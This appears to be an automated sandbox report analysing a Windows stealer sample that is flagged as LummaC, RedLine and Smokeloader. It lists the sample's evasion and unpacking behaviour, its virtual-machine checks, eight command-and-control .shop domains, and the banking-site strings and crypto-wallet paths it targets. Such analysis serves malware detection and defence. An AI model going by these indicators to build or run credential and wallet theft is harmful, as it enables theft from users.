Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02108CC7	0_2_02108CC7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02140D67	0_2_02140D67
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02105D67	0_2_02105D67
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02121D97	0_2_02121D97
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02102DA7	0_2_02102DA7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02109DD7	0_2_02109DD7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02117DFA	0_2_02117DFA
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0212FDE4	0_2_0212FDE4

Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: String function: 021084E7 appears 71 times
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: String function: 00408280 appears 47 times
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: String function: 02114E87 appears 145 times
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: String function: 00414C20 appears 145 times

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1816

Source: SOElePqvtf.exe, 00000000.00000000.1349030086.000000000044E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOriginal4 vs SOElePqvtf.exe
Source: SOElePqvtf.exe	Binary or memory string: OriginalFilenamesOriginal4 vs SOElePqvtf.exe

Source: SOElePqvtf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1585442672.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: SOElePqvtf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Code function: 0_2_005107A6 CreateToolhelp32Snapshot,Module32First,

0_2_005107A6

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Code function: 0_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_0043D0D0

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7336

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\395ad118-d81d-4f3d-825d-c54254cd951f

Jump to behavior

Source: SOElePqvtf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SOElePqvtf.exe, 00000000.00000003.1389399893.0000000002ED6000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1402835018.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1389858199.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SOElePqvtf.exe	Virustotal: Detection: 37%
Source: SOElePqvtf.exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\SOElePqvtf.exe

File read: C:\Users\user\Desktop\SOElePqvtf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SOElePqvtf.exe "C:\Users\user\Desktop\SOElePqvtf.exe"
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1816

Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\SOElePqvtf.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Unpacked PE file: 0.2.SOElePqvtf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Unpacked PE file: 0.2.SOElePqvtf.exe.400000.0.unpack

Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004499A1 push esp; ret	0_2_004499A2
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0044AAD0 push ecx; retn 0041h	0_2_0044AAD5
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_005130C7 push 0F56897Eh; iretd	0_2_005130DF
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00512361 push 00000004h; ret	0_2_00512375
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0051646F push ebp; ret	0_2_00516470
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00513CDA push esi; retn 001Ch	0_2_00513CDE
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02131A8C pushad ; retf 0044h	0_2_02131A93

Source: SOElePqvtf.exe

Static PE information: section name: .text entropy: 7.837501375498493

Source: C:\Users\user\Desktop\SOElePqvtf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\SOElePqvtf.exe TID: 7416

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\SOElePqvtf.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005BA000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1387869831.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.4.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: SOElePqvtf.exe, 00000000.00000003.1402551203.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\Desktop\SOElePqvtf.exe

API call chain: ExitProcess graph end node

graph_0-27397

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Code function: 0_2_00442080 LdrInitializeThunk,

0_2_00442080

Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00510083 push dword ptr fs:[00000030h]	0_2_00510083
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0210092B mov eax, dword ptr fs:[00000030h]	0_2_0210092B
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02100D90 mov eax, dword ptr fs:[00000030h]	0_2_02100D90

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: SOElePqvtf.exe	String found in binary or memory: cloudewahsj.shop
Source: SOElePqvtf.exe	String found in binary or memory: rabidcowse.shop
Source: SOElePqvtf.exe	String found in binary or memory: noisycuttej.shop
Source: SOElePqvtf.exe	String found in binary or memory: tirepublicerj.shop
Source: SOElePqvtf.exe	String found in binary or memory: framekgirus.shop
Source: SOElePqvtf.exe	String found in binary or memory: wholersorie.shop
Source: SOElePqvtf.exe	String found in binary or memory: abruptyopsn.shop
Source: SOElePqvtf.exe	String found in binary or memory: nearycrepso.shop

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: SOElePqvtf.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
